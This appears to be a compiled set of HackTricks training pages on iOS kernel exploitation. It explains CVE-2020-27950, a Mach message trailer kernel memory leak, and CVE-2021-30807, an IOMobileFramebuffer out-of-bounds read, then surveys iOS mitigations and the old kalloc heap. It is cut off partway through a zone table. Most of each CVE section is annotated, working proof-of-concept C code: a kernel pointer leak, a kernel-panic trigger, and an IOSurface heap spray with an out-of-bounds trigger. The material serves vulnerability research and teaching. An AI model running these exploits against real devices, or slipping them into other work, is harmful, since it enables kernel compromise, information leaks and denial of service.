# CVE-2020-27950: mach_msg Trailer Kernel Memory Leak

{{#include ../../banners/hacktricks-training.md}}


## The Bug

You have a [great explanation of the vuln here](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), but as a summary:

Every Mach message the kernel receives ends with a **"trailer"**: a variable-length struct with metadata (seqno, sender token, audit token, context, access control data, labels...). The kernel **always reserves the largest possible trailer** (MAX_TRAILER_SIZE) in the message buffer, but **only initializes some fields**, then later **decides which trailer size to return** based on **user-controlled receive options**.

These are the relevant trailer structs:

```c
typedef struct {
    mach_msg_trailer_type_t msgh_trailer_type;
    mach_msg_trailer_size_t msgh_trailer_size;
} mach_msg_trailer_t;

typedef struct {
    mach_msg_trailer_type_t msgh_trailer_type;
    mach_msg_trailer_size_t msgh_trailer_size;
    mach_port_seqno_t       msgh_seqno;
    security_token_t        msgh_sender;
    audit_token_t           msgh_audit;
    mach_port_context_t     msgh_context;
    int                     msgh_ad;
    msg_labels_t            msgh_labels;
} mach_msg_mac_trailer_t;

#define MACH_MSG_TRAILER_MINIMUM_SIZE sizeof(mach_msg_trailer_t)
typedef mach_msg_mac_trailer_t mach_msg_max_trailer_t;
#define MAX_TRAILER_SIZE ((mach_msg_size_t)sizeof(mach_msg_max_trailer_t))
```

Then, when the trailer object is generated, only some fields are initialized, and the max trailer size is always reserved:

```c
trailer = (mach_msg_max_trailer_t *)((vm_offset_t)kmsg->ikm_header + size);
trailer->msgh_sender = current_thread()->task->sec_token;
trailer->msgh_audit = current_thread()->task->audit_token;
trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;
[...]
trailer->msgh_labels.sender = 0;
```

Then, for example, when trying to read a Mach message using `mach_msg()`, the function `ipc_kmsg_add_trailer()` is called to append the trailer to the message. Inside this function the trailer size is calculated and some other trailer fields are filled:

```c
if (!(option & MACH_RCV_TRAILER_MASK)) { [3]
    return trailer->msgh_trailer_size;
}

trailer->msgh_seqno = seqno;
trailer->msgh_context = context;
trailer->msgh_trailer_size = REQUESTED_TRAILER_SIZE(thread_is_64bit_addr(thread), option);
```

The `option` parameter is user-controlled, so **we need to pass a value that gets past the `if` check.**

To pass this check we need to send a supported `option`:

```c
#define MACH_RCV_TRAILER_NULL   0
#define MACH_RCV_TRAILER_SEQNO  1
#define MACH_RCV_TRAILER_SENDER 2
#define MACH_RCV_TRAILER_AUDIT  3
#define MACH_RCV_TRAILER_CTX    4
#define MACH_RCV_TRAILER_AV     7
#define MACH_RCV_TRAILER_LABELS 8

#define MACH_RCV_TRAILER_TYPE(x)     (((x) & 0xf) << 28)
#define MACH_RCV_TRAILER_ELEMENTS(x) (((x) & 0xf) << 24)
#define MACH_RCV_TRAILER_MASK        ((0xf << 24))
```

However, because `MACH_RCV_TRAILER_MASK` only checks whether any of those bits are set, we can pass any elements value between `1` and `8` (not just the defined constants) and still avoid the early return inside the `if` statement.

Then, continuing with the code, you can find:

```c
if (GET_RCV_ELEMENTS(option) >= MACH_RCV_TRAILER_AV) {
    trailer->msgh_ad = 0;
}

/*
 * The ipc_kmsg_t holds a reference to the label of a label
 * handle, not the port. We must get a reference to the port
 * and a send right to copyout to the receiver.
 */

if (option & MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_LABELS)) {
    trailer->msgh_labels.sender = 0;
}

done:
#ifdef __arm64__
    ipc_kmsg_munge_trailer(trailer, real_trailer_out, thread_is_64bit_addr(thread));
#endif /* __arm64__ */

    return trailer->msgh_trailer_size;
```

Here you can see that if the requested elements value is greater than or equal to `MACH_RCV_TRAILER_AV` (7), the field **`msgh_ad`** is initialized to `0`.

Note that **`msgh_ad`** was the only trailer field that was not initialized earlier, so it can still contain a leak from previously used memory.

So, the way to avoid initializing it is to pass an `option` elements value of `5` or `6`: it passes the first `if` check but doesn't enter the `if` that initializes `msgh_ad`, because the values `5` and `6` don't have any trailer type associated with them.

### Basic PoC

Inside the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), you have a PoC that just leaks some random (uninitialized) data, as in the sketch below.

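A minimal sketch of the trigger (assuming `port` is a receive right you own with a message already queued, and that `leak_buf`/`buf_size` describe a receive buffer large enough for the message body plus `MAX_TRAILER_SIZE`; both names are illustrative, not from the original PoC):

```c
// Minimal sketch (not the full PoC): receive a queued message while asking for
// an undefined trailer elements value (5). On vulnerable kernels the returned
// max-size trailer has msgh_ad left uninitialized -> stale kernel heap bytes.
#include <stdio.h>
#include <mach/mach.h>

void leak_once(mach_port_t port, void *leak_buf, mach_msg_size_t buf_size) {
    kern_return_t kr = mach_msg((mach_msg_header_t *)leak_buf,
                                MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5), // 5 has no trailer type
                                0,
                                buf_size,              // body + MAX_TRAILER_SIZE
                                port,
                                MACH_MSG_TIMEOUT_NONE,
                                MACH_PORT_NULL);
    if (kr != KERN_SUCCESS)
        printf("mach_msg: %s\n", mach_error_string(kr));
    // The mach_msg_mac_trailer_t at the end of leak_buf now has msgh_ad uninitialized.
}
```
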
### Leak Kernel Address PoC

In the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak) you also have a PoC to leak a kernel address. For this, the message is filled with `mach_msg_port_descriptor_t` structs, because the `name` field of this structure is an unsigned int in userland but becomes a `struct ipc_port` pointer inside the kernel. Therefore, sending tens of these structs in a message **places several kernel addresses inside the in-kernel copy of the message**, so one of them can be leaked.

Comments were added for better understanding:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <mach/mach.h>

// Number of OOL port descriptors in the "big" message.
// This layout aims to fit messages into kalloc.1024 (empirically good on impacted builds).
#define LEAK_PORTS 50

// "Big" message: many descriptors → larger descriptor array in kmsg
typedef struct {
    mach_msg_header_t header;
    mach_msg_body_t body;
    mach_msg_port_descriptor_t sent_ports[LEAK_PORTS];
} message_big_t;

// "Small" message: fewer descriptors → leaves more room for the trailer
// to overlap where descriptor pointers used to be in the reused kalloc chunk.
typedef struct {
    mach_msg_header_t header;
    mach_msg_body_t body;
    mach_msg_port_descriptor_t sent_ports[LEAK_PORTS - 10];
} message_small_t;

int main(int argc, char *argv[]) {
    mach_port_t port;      // our local receive port (target of sends)
    mach_port_t sent_port; // the port whose kernel address we want to leak

    /*
     * 1) Create a receive right and attach a send right so we can send to ourselves.
     *    This gives us predictable control over ipc_kmsg allocations when we send.
     */
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);

    /*
     * 2) Create another receive port (sent_port). We'll reference this port
     *    in OOL descriptors so the kernel stores pointers to its ipc_port
     *    structure in the kmsg → those pointers are what we aim to leak.
     */
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &sent_port);
    mach_port_insert_right(mach_task_self(), sent_port, sent_port, MACH_MSG_TYPE_MAKE_SEND);

    printf("[*] Will get port %x address\n", sent_port);

    message_big_t *big_message = NULL;
    message_small_t *small_message = NULL;

    // Compute userland sizes of our message structs
    mach_msg_size_t big_size = (mach_msg_size_t)sizeof(*big_message);
    mach_msg_size_t small_size = (mach_msg_size_t)sizeof(*small_message);

    // Allocate user buffers for the two send messages (+MAX_TRAILER_SIZE for safety/margin)
    big_message = malloc(big_size + MAX_TRAILER_SIZE);
    small_message = malloc(small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);

    /*
     * 3) Prepare the "big" message:
     *    - Complex bit set (has descriptors)
     *    - 50 OOL port descriptors, all pointing to the same sent_port
     *    When you send a Mach message with port descriptors, the kernel "copy-ins" the userland port names (integers in your process's IPC space) into an in-kernel ipc_kmsg_t, and resolves each name to the actual kernel object (an ipc_port).
     *    Inside the kernel message, the header/descriptor area holds object pointers, not user names. On the way out (to the receiver), XNU "copy-outs" and converts those pointers back into names. This is explicitly documented in the copyout path: "the remote/local port fields contain port names instead of object pointers" (meaning they were pointers in-kernel).
     */
    printf("[*] Creating first kalloc.1024 ipc_kmsg\n");
    memset(big_message, 0, big_size + MAX_TRAILER_SIZE);

    big_message->header.msgh_remote_port = port; // send to our receive right
    big_message->header.msgh_size = big_size;
    big_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
                                    | MACH_MSGH_BITS_COMPLEX;
    big_message->body.msgh_descriptor_count = LEAK_PORTS;

    for (int i = 0; i < LEAK_PORTS; i++) {
        big_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
        big_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
        big_message->sent_ports[i].name = sent_port; // repeated to fill array with pointers
    }

    /*
     * 4) Prepare the "small" message:
     *    - Fewer descriptors (LEAK_PORTS-10) so that, when the kalloc.1024 chunk is reused,
     *      the trailer sits earlier and *overlaps* bytes where descriptor pointers lived.
     */
    printf("[*] Creating second kalloc.1024 ipc_kmsg\n");
    memset(small_message, 0, small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);

    small_message->header.msgh_remote_port = port;
    small_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
                                      | MACH_MSGH_BITS_COMPLEX;
    small_message->body.msgh_descriptor_count = LEAK_PORTS - 10;

    for (int i = 0; i < LEAK_PORTS - 10; i++) {
        small_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
        small_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
        small_message->sent_ports[i].name = sent_port;
    }

    /*
     * 5) Receive buffer for reading back messages with trailers.
     *    We'll request a *max-size* trailer via MACH_RCV_TRAILER_ELEMENTS(5).
     *    On vulnerable kernels, field `msgh_ad` (in mac trailer) may be left uninitialized
     *    if the requested elements value is < MACH_RCV_TRAILER_AV, causing stale bytes to leak.
     */
    uint8_t *buffer = malloc(big_size + MAX_TRAILER_SIZE);
    mach_msg_mac_trailer_t *trailer; // interpret the tail as a "mac trailer" (format 0 / 64-bit variant internally)
    uintptr_t sent_port_address = 0; // we'll build the 64-bit pointer from two 4-byte leaks

    /*
     * ---------- Exploitation sequence ----------
     *
     * Step A: Send the "big" message → allocate a kalloc.1024 ipc_kmsg that contains many
     *         kernel pointers (ipc_port*) in its descriptor array.
     */
    printf("[*] Sending message 1\n");
    mach_msg(&big_message->header,
             MACH_SEND_MSG,
             big_size,            // send size
             0,                   // no receive
             MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE,
             MACH_PORT_NULL);

    /*
     * Step B: Immediately receive/discard it with a zero-sized buffer.
     *         This frees the kalloc chunk without copying descriptors back,
     *         leaving the kernel pointers resident in freed memory (stale).
     */
    printf("[*] Discarding message 1\n");
    mach_msg((mach_msg_header_t *)0,
             MACH_RCV_MSG,        // try to receive
             0,                   // send size 0
             0,                   // recv size 0 (forces error/free path)
             port,
             MACH_MSG_TIMEOUT_NONE,
             MACH_PORT_NULL);

    /*
     * Step C: Reuse the same size-class with the "small" message (fewer descriptors).
     *         We slightly bump msgh_size by +4 so that when the kernel appends
     *         the trailer, the trailer's uninitialized field `msgh_ad` overlaps
     *         the low 4 bytes of a stale ipc_port* pointer from the prior message.
     */
    small_message->header.msgh_size = small_size + sizeof(uint32_t); // +4 to shift overlap window
    printf("[*] Sending message 2\n");
    mach_msg(&small_message->header,
             MACH_SEND_MSG,
             small_size + sizeof(uint32_t),
             0,
             MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE,
             MACH_PORT_NULL);

    /*
     * Step D: Receive message 2 and request an invalid trailer elements value (5).
     *         - Bits 24..27 (MACH_RCV_TRAILER_MASK) are nonzero → the kernel computes a trailer.
     *         - Elements=5 doesn't match any valid enum → REQUESTED_TRAILER_SIZE(...) falls back to max size.
     *         - BUT init of certain fields (like `ad`) is guarded by >= MACH_RCV_TRAILER_AV (7),
     *           so with 5, `msgh_ad` remains uninitialized → stale bytes leak.
     */
    memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
    printf("[*] Reading back message 2\n");
    mach_msg((mach_msg_header_t *)buffer,
             MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5), // core of CVE-2020-27950
             0,
             small_size + sizeof(uint32_t) + MAX_TRAILER_SIZE, // ensure room for max trailer
             port,
             MACH_MSG_TIMEOUT_NONE,
             MACH_PORT_NULL);

    // Trailer begins right after the message body we sent (small_size + 4)
    trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t));

    // Leak low 32 bits from msgh_ad (stale data → expected to be the low dword of an ipc_port*)
    sent_port_address |= (uint32_t)trailer->msgh_ad;

    /*
     * Step E: Repeat the A→D cycle but now shift by another +4 bytes.
     *         This moves the overlap window so `msgh_ad` captures the high 4 bytes.
     */
    printf("[*] Sending message 3\n");
    mach_msg(&big_message->header, MACH_SEND_MSG, big_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    printf("[*] Discarding message 3\n");
    mach_msg((mach_msg_header_t *)0, MACH_RCV_MSG, 0, 0, port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    // add another +4 to msgh_size → total +8 shift from the baseline
    small_message->header.msgh_size = small_size + sizeof(uint32_t)*2;
    printf("[*] Sending message 4\n");
    mach_msg(&small_message->header,
             MACH_SEND_MSG,
             small_size + sizeof(uint32_t)*2,
             0,
             MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE,
             MACH_PORT_NULL);

    memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
    printf("[*] Reading back message 4\n");
    mach_msg((mach_msg_header_t *)buffer,
             MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5),
             0,
             small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE,
             port,
             MACH_MSG_TIMEOUT_NONE,
             MACH_PORT_NULL);

    trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t)*2);

    // Combine the high 32 bits, reconstructing the full 64-bit kernel pointer
    sent_port_address |= ((uintptr_t)trailer->msgh_ad) << 32;

    printf("[+] Port %x has address %lX\n", sent_port, sent_port_address);

    return 0;
}
```

## References

- [Synacktiv's blog post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak)

{{#include ../../banners/hacktricks-training.md}}

# CVE-2021-30807: IOMobileFrameBuffer OOB

{{#include ../../banners/hacktricks-training.md}}


## The Bug

You have a [great explanation of the vuln here](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/), but as a summary:

- The vulnerable code path is **external method #83** of the **IOMobileFramebuffer / AppleCLCD** user client: `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`. This method receives a user-controlled parameter that is not checked in any way and that is passed to the next function as **`scalar0`**.

- That method forwards into **`IOMobileFramebufferLegacy::get_displayed_surface(this, task*, out_id, scalar0)`**, where **`scalar0`** (a user-controlled **32-bit** value) is used as an **index** into an internal **array of pointers** without **any bounds check**:

> `ptr = *(this + 0xA58 + scalar0 * 8);` → passed to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)` as an **`IOSurface*`**.\
> **Result:** **OOB pointer read & type confusion** on that array. If the pointer isn't valid, the kernel deref panics → **DoS**.

> [!NOTE]
> This was fixed in **iOS/iPadOS 14.7.1**, **macOS Big Sur 11.5.1** and **watchOS 7.6.1**.

> [!WARNING]
> The initial function to call `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)` is protected by the entitlement **`com.apple.private.allow-explicit-graphics-priority`**. However, **WebKit.WebContent** has this entitlement, so it can be used to trigger the vuln from a sandboxed process.

## DoS PoC

The following is the initial DoS PoC from the original blog post with extra comments:

```c
// PoC for CVE-2021-30807 trigger (annotated)
// NOTE: This demonstrates the crash trigger; it is NOT an LPE.
// Build/run only on devices you own and that are vulnerable.
// Patched in iOS/iPadOS 14.7.1, macOS 11.5.1, watchOS 7.6.1. (Apple advisory)
// https://support.apple.com/en-us/103144
// https://nvd.nist.gov/vuln/detail/CVE-2021-30807

void trigger_clcd_vuln(void) {
    kern_return_t ret;
    io_connect_t shared_user_client_conn = MACH_PORT_NULL;

    // The "type" argument is the type (selector) of user client to open.
    // For IOMobileFramebuffer, 2 typically maps to a user client that exposes the
    // external methods we need (incl. selector 83). If this doesn't work on your
    // build, try different types or query IORegistry to enumerate.
    int type = 2;

    // 1) Locate the IOMobileFramebuffer service in the IORegistry.
    //    This returns the first matched service object (a kernel object handle).
    io_service_t service = IOServiceGetMatchingService(
        kIOMasterPortDefault,
        IOServiceMatching("IOMobileFramebuffer"));

    if (service == MACH_PORT_NULL) {
        printf("failed to open service\n");
        return;
    }

    printf("service: 0x%x\n", service);

    // 2) Open a connection (user client) to the service.
    //    The user client is what exposes external methods to userland.
    //    'type' selects which user client class/variant to instantiate.
    ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
    if (ret != KERN_SUCCESS) {
        printf("failed to open userclient: %s\n", mach_error_string(ret));
        return;
    }

    printf("client: 0x%x\n", shared_user_client_conn);

    printf("call externalMethod\n");

    // 3) Prepare input scalars for the external method call.
    //    The vulnerable path uses a 32-bit scalar as an INDEX into an internal
    //    array of pointers WITHOUT bounds checking (OOB read / type confusion).
    //    We set it to a large value to force the out-of-bounds access.
    uint64_t scalars[4] = { 0x0 };
    scalars[0] = 0x41414141; // **Attacker-controlled index** → OOB pointer lookup

    // 4) Prepare output buffers (the method returns a scalar, e.g. a surface ID).
    uint64_t output_scalars[4] = { 0 };
    uint32_t output_scalars_size = 1;

    printf("call s_default_fb_surface\n");

    // 5) Invoke external method #83.
    //    On vulnerable builds, this path ends up calling:
    //      IOMobileFramebufferUserClient::s_displayed_fb_surface(...)
    //      → IOMobileFramebufferLegacy::get_displayed_surface(...)
    //    which uses our index to read a pointer and then passes it as IOSurface*.
    //    If the pointer is bogus, IOSurface code will dereference it and the kernel
    //    will panic (DoS).
    ret = IOConnectCallMethod(
        shared_user_client_conn,
        83,                                     // **Selector 83**: vulnerable external method
        scalars, 1,                             // input scalars (count = 1; the OOB index)
        NULL, 0,                                // no input struct
        output_scalars, &output_scalars_size,  // optional outputs
        NULL, NULL);                            // no output struct

    // 6) Check the call result. On many vulnerable targets, you'll see either
    //    KERN_SUCCESS right before a panic (because the deref happens deeper),
    //    or an error if the call path rejects the request (e.g., entitlement/type).
    if (ret != KERN_SUCCESS) {
        printf("failed to call external method: 0x%x --> %s\n",
               ret, mach_error_string(ret));
        return;
    }

    printf("external method returned KERN_SUCCESS\n");

    // 7) Clean up the user client connection handle.
    IOServiceClose(shared_user_client_conn);
    printf("success!\n");
}
```

## Arbitrary Read PoC Explained

1. **Opening the right user client**

   - `get_appleclcd_uc()` finds the **AppleCLCD** service and opens **user client type 2**. AppleCLCD and IOMobileFramebuffer share the same external-methods table; type 2 exposes **selector 83**, the vulnerable method. **This is your entry to the bug.**

   **Why 83 matters:** the decompiled path is:

   - `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`\
     → `IOMobileFramebufferUserClient::get_displayed_surface(...)`\
     → `IOMobileFramebufferLegacy::get_displayed_surface(...)`\
     Inside that last call, the code **uses your 32-bit scalar as an array index with no bounds check**, fetches a pointer from **`this + 0xA58 + index*8`**, and **passes it as an `IOSurface*`** to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)`. **That's the OOB + type confusion.**

2. **The heap spray (why IOSurface shows up here)**

   - `do_spray()` uses **`IOSurfaceRootUserClient`** to **create many IOSurfaces** and **spray small values** (`s_set_value` style). This fills nearby kernel heaps with **pointers to valid IOSurface objects**.

   - **Goal:** when selector 83 reads past the legit table, the **OOB slot likely contains a pointer to one of your (real) IOSurfaces**, so the later dereference **doesn't crash** and **succeeds**. IOSurface is a classic, well-documented kernel spray primitive, and Saar's post explicitly lists the **create / set_value / lookup** methods used for this exploitation flow.

3. **The "offset/8" trick (what that index really is)**

   - In `trigger_oob(offset)`, you set `scalars[0] = offset / 8`.

   - **Why divide by 8?** The kernel does **`base + index*8`** to compute which **pointer-sized slot** to read. You're picking **"slot number N"**, not a byte offset. **Eight bytes per slot** on 64-bit.

   - That computed address is **`this + 0xA58 + index*8`**. The PoC uses a big constant (`0x1200000 + 0x1048`) simply to step **far out of bounds** into a region you've tried to **densely populate with IOSurface pointers**. **If the spray "wins," the slot you hit is a valid `IOSurface*`.**

4. **What selector 83 returns (this is the subtle part)**

   - The call is:

     `IOConnectCallMethod(appleclcd_uc, 83, scalars, 1, NULL, 0, output_scalars, &output_scalars_size, NULL, NULL);`

   - Internally, after the OOB pointer fetch, the driver calls\
     **`IOSurfaceRoot::copyPortNameForSurfaceInTask(task, IOSurface*, out_u32*)`**.

   - **Result:** **`output_scalars[0]` is a Mach port name (u32 handle) in your task** for *whatever object pointer you supplied via OOB*. **It is not a raw kernel address leak; it's a userspace handle (send right).** This exact behavior (copying a *port name*) is shown in Saar's decompilation.

   **Why that's useful:** with a **port name** to the (supposed) IOSurface, you can now use **IOSurfaceRoot methods** like:

   - **`s_lookup_surface_from_port` (method 34)** → turn the port into a **surface ID** you can operate on through other IOSurface calls, and

   - **`s_create_port_from_surface` (method 35)** if you need the inverse.\
     Saar calls out these exact methods as the next step. **The PoC is proving you can "manufacture" a legitimate IOSurface handle from an OOB slot.** ([Saaramar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/))

This [PoC was taken from here](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC/blob/main/poc/exploit.c) and some comments were added to explain the steps:

```c
#include "exploit.h"

// Open the AppleCLCD (aka IOMFB) user client so we can call external methods.
io_connect_t get_appleclcd_uc(void) {
    kern_return_t ret;
    io_connect_t shared_user_client_conn = MACH_PORT_NULL;
    int type = 2; // **UserClient type**: variant that exposes selector 83 on affected builds. ⭐
                  // (AppleCLCD and IOMobileFramebuffer share the same external methods table.)

    // Find the **AppleCLCD** service in the IORegistry.
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                       IOServiceMatching("AppleCLCD"));
    if(service == MACH_PORT_NULL) {
        printf("[-] failed to open service\n");
        return MACH_PORT_NULL;
    }
    printf("[*] AppleCLCD service: 0x%x\n", service);

    // Open a user client connection to AppleCLCD with the chosen **type**.
    ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
    if(ret != KERN_SUCCESS) {
        printf("[-] failed to open userclient: %s\n", mach_error_string(ret));
        return MACH_PORT_NULL;
    }
    printf("[*] AppleCLCD userclient: 0x%x\n", shared_user_client_conn);
    return shared_user_client_conn;
}

// Trigger the OOB index path of external method #83.
// The 'offset' you pass is in bytes; dividing by 8 converts it to the
// index of an 8-byte pointer slot in the internal table at (this + 0xA58).
uint64_t trigger_oob(uint64_t offset) {
    kern_return_t ret;

    // The method takes a single 32-bit scalar that it uses as an index.
    uint64_t scalars[1] = { 0x0 };
    scalars[0] = offset / 8; // **index = byteOffset / sizeof(void*)**. ⭐

    // #83 returns one scalar. In this flow it will be the Mach port name
    // (a u32 handle in our task), not a kernel pointer.
    uint64_t output_scalars[1] = { 0 };
    uint32_t output_scalars_size = 1;

    io_connect_t appleclcd_uc = get_appleclcd_uc();
    if (appleclcd_uc == MACH_PORT_NULL) {
        return 0;
    }

    // Call external method 83. Internally:
    //   ptr = *(this + 0xA58 + index*8);   // OOB pointer fetch
    //   IOSurfaceRoot::copyPortNameForSurfaceInTask(task, (IOSurface*)ptr, &out)
    // which creates a send right for that object and writes its port name
    // into output_scalars[0]. If ptr is junk → deref/panic (DoS).
    ret = IOConnectCallMethod(appleclcd_uc, 83,
                              scalars, 1,
                              NULL, 0,
                              output_scalars, &output_scalars_size,
                              NULL, NULL);

    if (ret != KERN_SUCCESS) {
        printf("[-] external method 83 failed: %s\n", mach_error_string(ret));
        return 0;
    }

    // This is the key: you get back a Mach port name (u32) to whatever
    // object was at that OOB slot (ideally an IOSurface you sprayed).
    printf("[*] external method 83 returned: 0x%llx\n", output_scalars[0]);
    return output_scalars[0];
}

// Heap-shape with IOSurfaces so an OOB slot likely contains a pointer to a
// real IOSurface (easier & stabler than a fully fake object).
bool do_spray(void) {
    char data[0x10];
    memset(data, 0x41, sizeof(data)); // Tiny payload for value spraying.

    // Get IOSurfaceRootUserClient (reachable from sandbox/WebContent).
    io_connect_t iosurface_uc = get_iosurface_root_uc();
    if (iosurface_uc == MACH_PORT_NULL) {
        printf("[-] do_spray: failed to allocate new iosurface_uc\n");
        return false;
    }

    // Create many IOSurfaces and use set_value / value spray helpers
    // (Brandon Azad-style) to fan out allocations in kalloc. ⭐
    int *surface_ids = (int*)malloc(SURFACES_COUNT * sizeof(int));
    for (size_t i = 0; i < SURFACES_COUNT; ++i) {
        surface_ids[i] = create_surface(iosurface_uc); // s_create_surface
        if (surface_ids[i] <= 0) {
            return false;
        }

        // Spray small values repeatedly: tends to allocate/fill predictable
        // kalloc regions near where the IOMFB table OOB will read from.
        // The "with_gc" flavor forces periodic GC to keep memory moving/packed.
        if (IOSurface_spray_with_gc(iosurface_uc, surface_ids[i],
                                    20, 200, // rounds, per-round items
                                    data, sizeof(data),
                                    NULL) == false) {
            printf("iosurface spray failed\n");
            return false;
        }
    }
    return true;
}

int main(void) {
    // Ensure we can talk to IOSurfaceRoot (some helpers depend on it).
    io_connect_t iosurface_uc = get_iosurface_root_uc();
    if (iosurface_uc == MACH_PORT_NULL) {
        return 0;
    }

    printf("[*] do spray\n");
    if (do_spray() == false) {
        printf("[-] shape failed, abort\n");
        return 1;
    }
    printf("[*] spray success\n");

    // Trigger the OOB read. The magic constant chooses a pointer-slot
    // far beyond the legit array (offset is in bytes; index = offset/8).
    // If the spray worked, this returns a **Mach port name** (handle) to one
    // of your sprayed IOSurfaces; otherwise it may crash.
    printf("[*] trigger\n");
    trigger_oob(0x1200000 + 0x1048);
    return 0;
}
```

## References

- [Original writeup by Saar Amar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/)
- [Exploit PoC code](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC)
- [Research from jsherman212](https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html)

{{#include ../../banners/hacktricks-training.md}}

# iOS Exploiting

{{#include ../../banners/hacktricks-training.md}}

## iOS Exploit Mitigations

- **Code Signing** in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple's trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
- **CoreTrust** is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Apple's root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
- **Data Execution Prevention (DEP)** marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (like the stack or heap) and running it, forcing them to rely on more complex techniques like ROP (Return-Oriented Programming).
- **ASLR (Address Space Layout Randomization)** randomizes the memory addresses of code, libraries, stack, and heap every time the system runs. This makes it much harder for attackers to predict where useful instructions or gadgets are, breaking many exploit chains that depend on fixed memory layouts.
- **KASLR (Kernel ASLR)** applies the same randomization concept to the iOS kernel. By shuffling the kernel's base address at each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise gain full system control.
- **Kernel Patch Protection (KPP)** continuously monitors the kernel's code pages to ensure they haven't been modified. If any tampering is detected, such as an exploit trying to patch kernel functions or insert malicious code, the device will immediately panic and reboot. This protection makes persistent kernel exploits far harder, as attackers can't simply hook or patch kernel instructions without triggering a system crash.
- **Kernel Text Readonly Region (KTRR)** is a hardware-based security feature introduced on iOS devices. It uses the CPU's memory controller to mark the kernel's code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers (and even privileged code) from patching kernel instructions at runtime, closing off a major class of exploits that relied on modifying kernel code directly.
- **Pointer Authentication Codes (PAC)** use cryptographic signatures embedded into unused bits of pointers to verify their integrity before use. When a pointer (like a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer was tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques like ROP or JOP much harder to pull off reliably.
- **Privileged Access Never (PAN)** is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables access. This stops attackers who gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
- **Page Protection Layer (PPL)** is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who gain kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.

## Old Kernel Heap (Pre-iOS 15 / Pre-A12 era)

The kernel used a **zone allocator** (`kalloc`) divided into fixed-size "zones."
Each zone only stores allocations of a single size class.

Example zones:

| Zone Name | Element Size | Example Use |
|----------------------|--------------|------------------------------------------------|
| `default.kalloc.16` | 16 bytes | Very small kernel structs, pointers. |
| `default.kalloc.32` | 32 bytes | Small structs, object headers. |
